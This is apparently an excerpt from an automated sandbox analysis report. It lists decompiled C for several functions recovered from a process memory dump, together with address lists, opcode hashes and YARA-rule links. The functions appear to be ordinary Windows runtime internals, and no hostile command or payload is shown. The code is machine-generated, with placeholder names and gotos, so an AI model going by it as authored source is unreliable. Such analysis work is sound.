					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0309F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0302EB70(_t29, 0x31070a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0305B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0309F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x31070c0; // 0x0
					while(_t38 != 0x31070c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x310b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x0301c96a
0x0301c974
0x0301c988
0x0301c98a
0x03087c9d
0x03087c9f
0x03087ca4
0x03087cae
0x03087cf0
0x03087cf5
0x03087cfa
0x0301c992
0x0301c996
0x0301c997
0x0301c998
0x0301c9a3
0x0301c9a3
0x03087cb0
0x03087cb7
0x03087cbb
0x00000000
0x00000000
0x03087cbd
0x03087ce8
0x03087cc5
0x03087cc8
0x03087cca
0x03087cd0
0x03087cd6
0x03087cde
0x03087ce4
0x03087ce4
0x03087cd0
0x00000000
0x03087ce8
0x0301c990
0x00000000

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29d5a15b31594f98b25f802d720f099c8a8db61f75dddbf6b030992b7e2df54d
Instruction ID: 5b6ea2cd20a71439602367ac7219ec20887f2930ee2e2dbbbb6281565f05b82d
Opcode Fuzzy Hash: 29d5a15b31594f98b25f802d720f099c8a8db61f75dddbf6b030992b7e2df54d
Instruction Fuzzy Hash: DF110E323017069BCB50FF28D984A6BBBE5BBC8A14B10062DF89187694DBA0EC50C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 030537F5, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E030537F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E03032280(_t6, 0x3108550);
				}
				_t29 = E0305387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E0302FFB0(0x3108550, _t27, 0x3108550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x030537fa
0x030537fc
0x03053805
0x03053808
0x03053808
0x03053814
0x03053818
0x03053846
0x03053848
0x0305384b
0x0305384b
0x03053852
0x00000000
0x03053854
0x03053856
0x00000000
0x00000000
0x03053863
0x00000000
0x03053863
0x0305381a
0x0305381a
0x0305381f
0x0305386e
0x0305386e
0x03053871
0x03053873
0x03053873
0x03053868
0x00000000
0x03053868
0x03053821
0x03053826
0x00000000
0x00000000
0x03053828
0x0305382a
0x03053841
0x00000000
0x03053841

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4792d07beaf5bec030077b981edbf7b390009649355d243f6ee82bd3c28699f6
Instruction ID: d3f55ba09f7c0fbef01c2a371baf68bc3337cc9f8619248a01aab7c7ba7a26d4
Opcode Fuzzy Hash: 4792d07beaf5bec030077b981edbf7b390009649355d243f6ee82bd3c28699f6
Instruction Fuzzy Hash: 8901A1BA9077119BC36BCA59D940B3BBBEADFC5B9071944E9FC458B210D730D801C790

Uniqueness

Uniqueness Score: -1.00%

Function 0304002D, Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0304002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E03037D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E03037D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E03037D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E03037D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x03040032
0x03040037
0x03040043
0x03084b3a
0x03040049
0x03040049
0x03040049
0x0304004e
0x03040053
0x03084b48
0x03084b5a
0x03084b4a
0x03084b53
0x03084b53
0x03084b5f
0x00000000
0x03084b61
0x00000000
0x03084b61
0x03040059
0x03040059
0x03040060
0x03084b6f
0x03084b6f
0x03040069
0x03084b83
0x00000000
0x00000000
0x03084b90
0x03084b9b
0x03084b9b
0x03084ba4
0x00000000
0x00000000
0x03084baa
0x00000000
0x0304006f
0x0304006f
0x00000000
0x0304006f
0x03040069

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: b97f41bddcc1fb582020b4c4bf030f9056d0ee91bd8206c6a3f7ea7a66a97f43
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: 0A1108B12037828FD762E72DC944B35B7E8AF82B54F0D04F0DE449B692D329D941C250

Uniqueness

Uniqueness Score: -1.00%

Function 0302766D, Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0302766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0304F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0304F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L03034620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x03027672
0x0302767f
0x03027689
0x030276de
0x030276de
0x0302768b
0x03027691
0x03027693
0x03027697
0x00000000
0x03027699
0x030276a8
0x00000000
0x030276aa
0x030276ad
0x030276b1
0x00000000
0x030276b3
0x030276b3
0x030276b5
0x030276ba
0x030276bc
0x030276bc
0x030276c0
0x00000000
0x030276c2
0x030276ce
0x030276ce
0x030276c0
0x030276b1
0x030276a8
0x03027697
0x030276d9

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: d12a3e1590e6ec128ee97e9df314d2eecf2aac58480b4a7463229581fa0ba22f
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: B901AC72702129ABC730DE9ECC45E9BBBADEB84E60F180574B908DF251DA30DD01C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 03019080, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E03019080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x31085ec;
				E03032280(_t48, 0x31085ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E0302FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x310538c; // 0x1426780
					if( *_t84 != 0x3105388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x30ef6e8);
						E0306D0E8(0x31085ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E030E88F5(_t80, _t85, 0x3105388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x31086c0; // 0x14107b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x31086b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E03032280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E030E88F5(0x31085ec, _t85, 0x3105388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0305AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x310b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x31084c0;
																			if(_t82 >=  *0x31084c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E030E9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0301922A(_t99);
										_t64 = E03037D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E030E8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x31086c0; // 0x14107b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x31086b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x31086bc;
													_t87 = 0x31086b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E03019240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x31086c4;
												_t87 = 0x31086c0;
												L27:
												E03049B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0306D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x3105388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x310538c = _t51;
						goto L6;
					}
				}
			}

0x03019082
0x03019083
0x03019084
0x03019085
0x03019087
0x03019096
0x03019098
0x03019098
0x0301909e
0x030190a8
0x030190e7
0x030190e7
0x030190aa
0x030190b0
0x030190b7
0x030190bd
0x030190dd
0x030190e6
0x030190bf
0x030190bf
0x030190c7
0x030190cf
0x030190f1
0x030190f2
0x030190f4
0x030190f5
0x030190f6
0x030190f7
0x030190f8
0x030190f9
0x030190fa
0x030190fb
0x030190fc
0x030190fd
0x030190fe
0x030190ff
0x03019100
0x03019102
0x03019107
0x0301910c
0x03019110
0x03019113
0x03019115
0x03019136
0x0301913f
0x03019143
0x030737e4
0x030737e4
0x03019117
0x03019117
0x0301911d
0x00000000
0x0301911f
0x0301911f
0x03019125
0x00000000
0x03019127
0x0301912d
0x03019130
0x03019134
0x03019158
0x0301915d
0x03019161
0x03019168
0x03073715
0x0301916e
0x0301916e
0x03019175
0x03019177
0x0301917e
0x0301917f
0x03019182
0x03019182
0x03019187
0x03019187
0x0301918a
0x0301918d
0x0301918f
0x03019192
0x03019195
0x03019198
0x03019198
0x03019198
0x0301919a
0x00000000
0x00000000
0x0307371f
0x03073721
0x03073727
0x0307372f
0x03073733
0x03073735
0x03073738
0x0307373b
0x0307373d
0x03073740
0x00000000
0x03073746
0x03073746
0x03073749
0x00000000
0x0307374f
0x0307374f
0x03073751
0x03073757
0x03073759
0x0307375c
0x0307375c
0x0307375e
0x0307375e
0x03073761
0x03073764
0x00000000
0x00000000
0x03073766
0x03073768
0x030737a3
0x030737a3
0x030737a5
0x030737a7
0x030737ad
0x030737b0
0x030737b2
0x030737bc
0x030737c2
0x030737c2
0x030737b2
0x03019187
0x03019187
0x0301918a
0x0301918d
0x0301918f
0x03019192
0x03019195
0x00000000
0x03019195
0x00000000
0x0307376a
0x0307376a
0x0307376a
0x0307376c
0x0307376c
0x0307376f
0x03073775
0x00000000
0x00000000
0x03073777
0x03073779
0x03073782
0x03073787
0x03073789
0x03073790
0x03073790
0x0307378b
0x0307378b
0x0307378b
0x03073792
0x03073795
0x00000000
0x03073795
0x00000000
0x03073779
0x03073798
0x00000000
0x03073798
0x00000000
0x03073768
0x0307379b
0x0307379b
0x03073751
0x03073749
0x00000000
0x03073740
0x030191a0
0x030191a3
0x030191a9
0x030191b0
0x00000000
0x030191b0
0x03019187
0x030191b4
0x030191b4
0x030191bb
0x030191c0
0x030191c5
0x030191c7
0x030737da
0x030191cd
0x030191cd
0x030191cd
0x030191d2
0x030191d5
0x03019239
0x03019239
0x030191d7
0x030191db
0x030191e1
0x030191e7
0x030191fd
0x03019203
0x0301921e
0x03019223
0x00000000
0x03019205
0x03019205
0x03019208
0x0301920c
0x03019214
0x03019214
0x0301920c
0x030191e9
0x030191e9
0x030191ee
0x030191f3
0x030191f3
0x030191f3
0x030191e7
0x00000000
0x00000000
0x00000000
0x03019134
0x03019125
0x0301911d
0x0301914e
0x030190d1
0x030190d1
0x030190d3
0x030190d6
0x030190d8
0x00000000
0x030190d8
0x030190cf

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dccfb98841337453ba054931d116a7d93929484db773dafb34e293b49d365692
Instruction ID: 6a94f33e87aa60a4de863aa59cfd462d75587a151b0fdc9346a4d89091421120
Opcode Fuzzy Hash: dccfb98841337453ba054931d116a7d93929484db773dafb34e293b49d365692
Instruction Fuzzy Hash: 360181725067049FC31ADF14D850B25BBE9EB8A724F254466E505DF691C3B4DC91CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 030AC450, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E030AC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E03059910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E030595B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E030595D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E030595D0();
				return L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x030ac458
0x030ac45d
0x030ac466
0x030ac468
0x030ac469
0x030ac46a
0x030ac46b
0x030ac46e
0x030ac46f
0x030ac471
0x030ac476
0x030ac476
0x030ac47c
0x030ac47e
0x030ac480
0x030ac480
0x030ac483
0x030ac484
0x030ac486
0x030ac488
0x030ac48f
0x030ac491
0x030ac493
0x030ac493
0x030ac48f
0x030ac498
0x030ac49e
0x030ac4ad
0x030ac4ad
0x030ac4b2
0x030ac4b4
0x030ac4cd

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: 76ba60d016fea1267dfb0195a6a23aa1c1e823193553d2ced9b2131e7501365b
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: 6C018076141A09BFE621EF69CC80EA3F7ADFB94790F054525F51586960CB31ACA0CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 030E4015, Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E030E4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E03032280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E03032280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x31086ac);
					E0301F900(0x31086d4, _t28);
					E0302FFB0(0x31086ac, _t28, 0x31086ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E0302FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L030377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x030e401a
0x030e401e
0x030e4023
0x030e4028
0x030e4029
0x030e402b
0x030e402f
0x030e4043
0x030e4046
0x030e4051
0x030e4057
0x030e405f
0x030e4062
0x030e4067
0x030e406f
0x030e407c
0x030e407c
0x030e408c
0x030e408c
0x030e4097

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faffb89ed0ba45c0aa2e3755fa02a96f0f0b77401f6fd1d680747f321c0641c9
Instruction ID: e0c96b96df6b8408527d28f0a5b9b80c8a2d45a12c5b6ac086dcd393791b9415
Opcode Fuzzy Hash: faffb89ed0ba45c0aa2e3755fa02a96f0f0b77401f6fd1d680747f321c0641c9
Instruction Fuzzy Hash: A90184752027497FC251EB69CD80E57B7ACFF89A50B000225F5088BA51CB34EC11C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 030D138A, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E030D138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x310d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0305FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E03037D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0305B640(E03059AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x030d138a
0x030d138a
0x030d1399
0x030d13a3
0x030d13a8
0x030d13aa
0x030d13b5
0x030d13bb
0x030d13c3
0x030d13c6
0x030d13c9
0x030d13d4
0x030d13e6
0x030d13d6
0x030d13df
0x030d13df
0x030d13f1
0x030d13f2
0x030d13f4
0x030d13f9
0x030d140e

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cb47344c4092b2f696457393d9a7215b67250ab1e74aab867ad1e30903e1d9b
Instruction ID: 02e0da8d3e950043f065bf1617ed138600deb7bff8036c2495cf0b1f29ded673
Opcode Fuzzy Hash: 0cb47344c4092b2f696457393d9a7215b67250ab1e74aab867ad1e30903e1d9b
Instruction Fuzzy Hash: BE015275A01318AFCB14DFA9D841EAFB7B8EF85710F044056B904EB280DA749A41C795

Uniqueness

Uniqueness Score: -1.00%

Function 030D14FB, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E030D14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x310d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0305FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E03037D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0305B640(E03059AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x030d14fb
0x030d14fb
0x030d150a
0x030d1514
0x030d1519
0x030d151b
0x030d1526
0x030d152c
0x030d1534
0x030d1537
0x030d153a
0x030d1545
0x030d1557
0x030d1547
0x030d1550
0x030d1550
0x030d1562
0x030d1563
0x030d1565
0x030d156a
0x030d157f

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41bb68e4a93cea707728ae491999bf4dfdb586f5782e6981aad3517e988be986
Instruction ID: e87a85cedea84e9a8055b9e6c1cd8a082b26baf835e092f50414e0f0e46bcd83
Opcode Fuzzy Hash: 41bb68e4a93cea707728ae491999bf4dfdb586f5782e6981aad3517e988be986
Instruction Fuzzy Hash: 06018075A02348EBDB04DFA8D841EAEB7B8EF85710F004056B904EB380DA74DA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 030158EC, Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E030158EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x310d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x2ff5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E03015943() != 0 &&  *0x3105320 > 5) {
					E03097B5E( &_v44, _t27);
					_t22 =  &_v28;
					E03097B5E( &_v28, _t28);
					_t11 = E03097B9C(0x3105320, 0x2ffbf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0305B640(_t11, _t17, _v8 ^ _t29, 0x2ffbf15, _t27, _t28);
			}

0x030158fb
0x030158fe
0x03015906
0x0301590a
0x0301593c
0x0301593c
0x0301590c
0x0301590c
0x03015911
0x00000000
0x03015913
0x03015913
0x03015913
0x03015911
0x0301591d
0x03071035
0x0307103c
0x0307103f
0x03071056
0x03071056
0x0301593b

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
